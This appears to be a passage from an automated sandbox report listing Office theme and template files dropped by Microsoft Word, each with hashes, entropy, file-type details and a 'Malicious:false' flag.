                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):284
                                        Entropy (8bit):3.5552837910707304
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                        MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                        SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                        SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                        SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):608122
                                        Entropy (8bit):7.729143855239127
                                        Encrypted:false
                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.516359852766808
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                        MD5:960E28B1E0AB3522A8A8558C02694ECF
                                        SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                        SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                        SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):486596
                                        Entropy (8bit):7.668294441507828
                                        Encrypted:false
                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.535303979138867
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                        MD5:35AFE8D8724F3E19EB08274906926A0B
                                        SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                        SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                        SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):523048
                                        Entropy (8bit):7.715248170753013
                                        Encrypted:false
                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.5159096381406645
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                        MD5:71CCB69AF8DD9821F463270FB8CBB285
                                        SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                        SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                        SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):570901
                                        Entropy (8bit):7.674434888248144
                                        Encrypted:false
                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):282
                                        Entropy (8bit):3.5459495297497368
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                        MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                        SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                        SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                        SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):558035
                                        Entropy (8bit):7.696653383430889
                                        Encrypted:false
                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.5361139545278144
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                        MD5:133D126F0DE2CC4B29ECE38194983265
                                        SHA1:D8D701298D7949BE6235493925026ED405290D43
                                        SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                        SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.438490642908344
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                        MD5:0F98498818DC28E82597356E2650773C
                                        SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                        SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                        SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):34415
                                        Entropy (8bit):7.352974342178997
                                        Encrypted:false
                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):966946
                                        Entropy (8bit):7.8785200658952
                                        Encrypted:false
                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):282
                                        Entropy (8bit):3.5323495192404475
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                        MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                        SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                        SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                        SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):777647
                                        Entropy (8bit):7.689662652914981
                                        Encrypted:false
                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.5091498509646044
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                        MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                        SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                        SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                        SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):976001
                                        Entropy (8bit):7.791956689344336
                                        Encrypted:false
                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.5270134268591966
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                        MD5:327DA4A5C757C0F1449976BE82653129
                                        SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                        SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                        SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):562113
                                        Entropy (8bit):7.67409707491542
                                        Encrypted:false
                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.535736910133401
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                        MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                        SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                        SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                        SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1091485
                                        Entropy (8bit):7.906659368807194
                                        Encrypted:false
                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                        MD5:2192871A20313BEC581B277E405C6322
                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.5301133500353727
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                        MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                        SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                        SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                        SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1204049
                                        Entropy (8bit):7.92476783994848
                                        Encrypted:false
                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.5364757859412563
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                        MD5:CD465E8DA15E26569897213CA9F6BC9C
                                        SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                        SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                        SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):1463634
                                        Entropy (8bit):7.898382456989258
                                        Encrypted:false
                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.5286004619027067
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                        MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                        SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                        SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                        SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                        Malicious:false
